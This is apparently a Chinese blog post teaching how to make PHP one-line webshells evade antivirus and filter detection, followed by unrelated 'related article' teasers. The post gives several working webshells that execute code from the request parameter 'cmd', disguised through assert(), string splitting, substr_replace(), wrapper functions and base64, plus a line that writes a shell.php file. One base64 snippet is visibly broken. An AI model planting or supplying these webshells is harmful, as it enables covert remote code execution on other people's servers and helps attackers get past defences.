php一句话木马免杀
php一句话木马免杀
针对于php一句话木马做免杀:
利用php动态函数的特性,将危险函数拆分成字符,最终使用字符串拼接的方式,然后重新拼接,后加括号执行代码,并且可以使用花指令进行包装,如无限if(1=1)套接,以此来做伪装绕过,达成免杀
assert()
如果过滤eval()函数时,可以考虑尝试assert()函数
assert() 会将字符串当做PHP 代码来执行
- assert() 只能执行单条PHP 语句。
- assert() 是一个函数,可以动态调用。
- 高版本PHP 中,assert() 被弃用
此时一句话木马即可构造为
<?php @assert($_REQUEST['cmd']); ?>
字符拼接函数
当eval和assert都被过滤时,即可考虑将函数拆分重组
例如
<?php$a="a"."s";$b="s"."e";$c="rt";$d=$a.$b.$c;$d($_REQUEST['cmd']);
?>
可正常执行
编码加密后也可连接
php函数替换拼接
可以使用php函数来进行字符串的替换拼接
substr_replace() 函数是 PHP 中用于替换字符串中的一部分内容的函数
使用方法:
string substr_replace ( string $string , string $replacement , int $start [, int $length ] )
参数说明:
$string:原始字符串。$replacement:替换的字符串。$start:替换的起始位置。$length:可选参数,指定要替换的长度。如果未指定,则替换从起始位置开始一直到字符串末尾的部分
示例
<?php$a=substr_replace("asxxxx","se",2);$b=substr_replace($a,"rt",4);@$b($_REQUEST['cmd']);
?>
同上可执行可连接
定义函数包裹
使用定义函数,将危险函数放进函数中,替代调用
<?phpfunction asrt1($a){assert($a);}@asrt1($_REQUEST['cmd']);
?>
GPC替换
当request被过滤时,尝试使用GET或者POST
当然该参数也可以使用字符串拼接等方式组合
加密
例如使用base64加密
<?php$a=base_decode(YXNzZXJ0/ZXZhbA==);$b=$a(base64_decode($_REQUEST['cmd']));
?>
生成一句话马文件
<?php file_put_contents('shell.php','<?php @assert($_REQUEST);?>')?>
同理,如果该函数中出现过滤,则可考虑使用上述的拼接替换字符
相关文章:
php一句话木马免杀
php一句话木马免杀 针对于php一句话木马做免杀: 利用php动态函数的特性,将危险函数拆分成字符,最终使用字符串拼接的方式,然后重新拼接,后加括号执行代码,并且可以使用花指令进行包装,如无限i…...
深度学习人体跌倒检测 -yolo 机器视觉 opencv python 计算机竞赛
0 前言 🔥 优质竞赛项目系列,今天要分享的是 🚩 **基于深度学习的人体跌倒检测算法研究与实现 ** 该项目较为新颖,适合作为竞赛课题方向,学长非常推荐! 🥇学长这里给一个题目综合评分(每项满…...
轻松整理文件夹,将视频文件全部归类到另一个文件夹!
如果你需要整理文件夹中的文件,将同一类别的文件归纳到一起,可以更加方便地管理和查找。现在,我们有一个简单而实用的方法,可以将文件夹中的所有视频文件归类到另一个文件夹中,让你的文件管理更加有序和高效。 首先&am…...
存储服务器特征是什么
存储服务器和普通服务器是有差别的,配置方式不同,因为存储服务器是为特定目标设计的,通常存储服务器是独立的单元,大多数时候是被设计成4U机架式,存储服务器一般是单机运作的,不与其他服务器连接。今天小编…...
Conditional GAN
Text-to-Image 对于根据文字生成图像的问题,传统的做法就是训练一个NN,然后输入一段文字,输出对应一个图片,输出图片与目标图片越接近越好。存在的问题就是,比如火车对应的图片有很多张,如果用传统的NN来训…...
OOM问题排查+Jvm优化
OOM问题排查: 1、top命令:查看cpu和内存的使用情况。 2、jstat命令:查看YGC和FGC情况,一般都是老年代不够用。导致OOM 3、jmap命令: 查看哪个类的实例过多,以每个类占用多少了内存。4、jstack 查看线程与线程之间的阻…...
链表:C++实现
引言: 链表是一种常见的数据结构,它由一系列节点组成,每个节点包含一个数据元素和一个指向下一个节点的指针。相比于数组,链表具有动态性和灵活性,可以高效地进行插入和删除操作,但是查找操作的时间复杂度较…...
使用JMX监控ZooKeeper和Kafka
JVM 默认会通过 JMX 的方式暴露基础指标,很多中间件也会通过 JMX 的方式暴露业务指标,比如 Kafka、Zookeeper、ActiveMQ、Cassandra、Spark、Tomcat、Flink 等等。掌握了 JMX 监控方式,就掌握了一批程序的监控方式。本节介绍 JMX-Exporter 的使用,利用 JMX-Exporter 把 JMX…...
蓝桥等考C++组别七级008
第一部分:选择题 1、C++ L7 (15分) 在判断是否满足循环条件之前,至少执行循环体语句一次的是哪种循环结构?( ) for循环while循环do-while循环以上都不是正确答案:C 2、C++ L7 (15分) 执行以下程序,会输出几个“*”?( ) for(int i = 0; i <= 10; i++){…...
sam和mobilesam导出预处理的onnx
一、前言 sam或者mobilesam的python推理都存在一些前处理,如下所示: sam.to(device=cuda) predictor = SamPredictor(sam) predictor.set_image(image) image_embedding = predictor.get_image_embedding().cpu().numpy() checkpoint = "./weights/mobile_sam.pt"…...
开源与闭源:大模型发展的双重走向
目录 前言开源和闭源的优劣势比较开源的优势闭源的优势 开源和闭源对大模型技术发展的影响对技术发展的影响对数据共享的影响对业务拓展的影响 开源与闭源的商业模式比较开源的商业模式闭源的商业模式 处在大模型洪流中,向何处去?结语 前言 随着人工智能…...
c# 逆变 / 协变
个人理解: 1. 逆变in向上兼容类 2. 协变out向下兼容类 在面向对象编程中,尤其是使用泛型时,in和out关键字用于限制类型参数的协变性和逆变性。 in关键字(逆变): in关键字用于标记泛型类型参数的逆变性。…...
electron使用better-sqlite3打包失败(electron打包有进程没有界面)
remove *\chrome_100_percent.pak: Access is denied. 解决: 管理员权限执行:taskkill /IM 你的进程名.exe /F,再次执行build electron使用better-sqlite3打包后有进程没有界面 原因是代码及依赖包安装有误,模块丢失。主要分享的…...
2.6文件服务器
2.6文件服务器 一、Ftp 介绍 文件传输协议(File Transfer Protocol,FTP),基于该协议FTP客户端与服务端可以实现共享文 件、上传文件、下载文件。 FTP 基于TCP协议生成一个虚拟的连接,主要用于控制FTP连接信息&#x…...
【C++ 学习 ㊴】- 详解 C++ 的 I/O 流
目录 一、C 的 I/O 流 二、C 的标准 I/O 流 三、C 的文件 I/O 流 一、C 的 I/O 流 C 语言有一套完成数据读写(I/O)的解决方案: 使用 scanf()、gets() 等函数从键盘读取数据,使用 printf()、puts() 等函数向屏幕输出数据&#…...
)
js算法面试题(附答案)
js算法面试题十道 两数之和 题目:给定一个整数数组 nums 和一个目标值 target,请你在该数组中找出和为目标值的那两个整数,并返回他们的数组下标。 function twoSum(nums, target) {const map new Map();for (let i 0; i < nums.leng…...
2023 年戴森设计大奖得主是谁?给大楼降温、争取救援机会
2023 年戴森设计大奖得主是谁?给大楼降温、争取救援机会 编辑拉风的极客2023/11/22 摘要 当今社会除了持续不断对科技创新保持注目,还有很多年轻发明家为了实际场景的难题提供解决方案。 11 月 15 日,2023 年戴森设计大奖国际大奖名单正…...
〖大前端 - 基础入门三大核心之JS篇㊲〗- DOM改变元素节点的css样式、HTML属性
说明:该文属于 大前端全栈架构白宝书专栏,目前阶段免费,如需要项目实战或者是体系化资源,文末名片加V!作者:不渴望力量的哈士奇(哈哥),十余年工作经验, 从事过全栈研发、产品经理等工作…...
【word技巧】Word制作试卷,ABCD选项如何对齐?
使用word文件制作试卷,如何将ABCD选项全部设置对齐?除了一直按空格或者Tab键以外,还有其他方法吗?今天分享如何将ABCD选项对齐。 首先,我们打开【替换和查找】,在查找内容输入空格,然后点击全部…...
OpenHarmony 4.1计划明年Q1发布, 5.0预计Q3发布
据HarmonyOS官方组织透露,OpenHarmony 4.0 版本已于 10 月 26 日正式发布,开发套件同步升级到 API 10。开放原子开源基金会现更新了 OpenHarmony 4.1&5.0 版本路线图。据介绍,OpenHarmony 4.1 Beta 版本预计将于年底完成测试并发布&#…...
3分钟学会GIMP Resynthesizer:免费开源插件让你成为图像修复专家
3分钟学会GIMP Resynthesizer:免费开源插件让你成为图像修复专家 【免费下载链接】resynthesizer Suite of gimp plugins for texture synthesis 项目地址: https://gitcode.com/gh_mirrors/re/resynthesizer 还在为照片中的瑕疵而烦恼吗?想要轻松…...
高效配置漫画转换工具:5个实用技巧打造完美电子墨水屏阅读体验
高效配置漫画转换工具:5个实用技巧打造完美电子墨水屏阅读体验 【免费下载链接】kcc KCC (a.k.a. Kindle Comic Converter) is a comic and manga converter for ebook readers. 项目地址: https://gitcode.com/gh_mirrors/kc/kcc 还在为电子阅读器上看漫画效…...
基于Docker与Claude SDK构建AI代理:Nagi项目架构解析与实战
1. 项目概述:构建你的个人AI副驾 如果你和我一样,每天的工作流被Slack、Discord、Asana等工具切割得支离破碎,总是在不同应用间切换,重复着“复制-粘贴-提问-等待”的循环,那么你大概也幻想过能有一个“数字副驾”。它…...
实战演练:利用Intel Realsense D435i和ROS实现实时点云地图构建
实战演练:利用Intel Realsense D435i和ROS实现实时点云地图构建 当RGB-D相机遇上机器人操作系统,一场关于三维感知的奇妙旅程就此展开。Intel Realsense D435i作为一款集成了IMU的深度相机,在SLAM、三维重建等领域展现出独特优势。本文将带您…...
如何快速掌握数据科学模式识别技术:从零到精通的完整学习指南
如何快速掌握数据科学模式识别技术:从零到精通的完整学习指南 【免费下载链接】data-science 📊 Path to a free self-taught education in Data Science! 项目地址: https://gitcode.com/gh_mirrors/da/data-science GitHub 加速计划 / da / dat…...
第15课:网页爬虫|反爬策略全解析【看懂网站如何“认出”你,为对抗打下地基】
文章目录学习目标一、通俗原理:反爬就是“门卫的十八般武艺”1.1 网站也是“有脾气的”1.2 反爬的“三层漏斗”模型1.3 反爬的“光谱”二、User-Agent校验:最基础的门卫2.1 原理2.2 触发条件2.3 识别方式2.4 真实案例:豆瓣的UA检测2.5 绕过思…...
5分钟掌握ContextMenuManager:彻底清理Windows右键菜单臃肿问题
5分钟掌握ContextMenuManager:彻底清理Windows右键菜单臃肿问题 【免费下载链接】ContextMenuManager 🖱️ 纯粹的Windows右键菜单管理程序 项目地址: https://gitcode.com/gh_mirrors/co/ContextMenuManager 还在为Windows右键菜单越来越长而烦恼…...
别再只刷新了!手把手教你排查Nginx/Apache/IIS网关超时504错误的5个实战场景
网关超时504错误深度排查:Nginx/Apache/IIS实战指南 当你深夜收到服务器告警短信,打开监控看到一片刺眼的504状态码时,那种头皮发麻的感觉我太熟悉了。作为经历过数百次网关超时战役的老兵,我想分享的不是教科书式的定义…...
服务网格与 Java:构建弹性微服务架构
服务网格与 Java:构建弹性微服务架构 核心概念 服务网格是一种专门用于处理服务间通信的基础设施层,它负责服务之间的可靠传递请求。在 Java 微服务架构中,服务网格可以提供流量管理、安全通信、可观测性和弹性能力,帮助构建更加可…...
实战指南:基于快马平台快速开发全栈tokenpo质押收益农场应用
今天想和大家分享一个最近在InsCode(快马)平台上快速搭建的实战项目——tokenpo质押收益农场应用。这个项目完美模拟了DeFi领域常见的代币质押和流动性挖矿场景,特别适合想学习全栈开发的朋友练手。 项目背景与需求分析 代币质押是区块链应用中非常经典的功能&#…...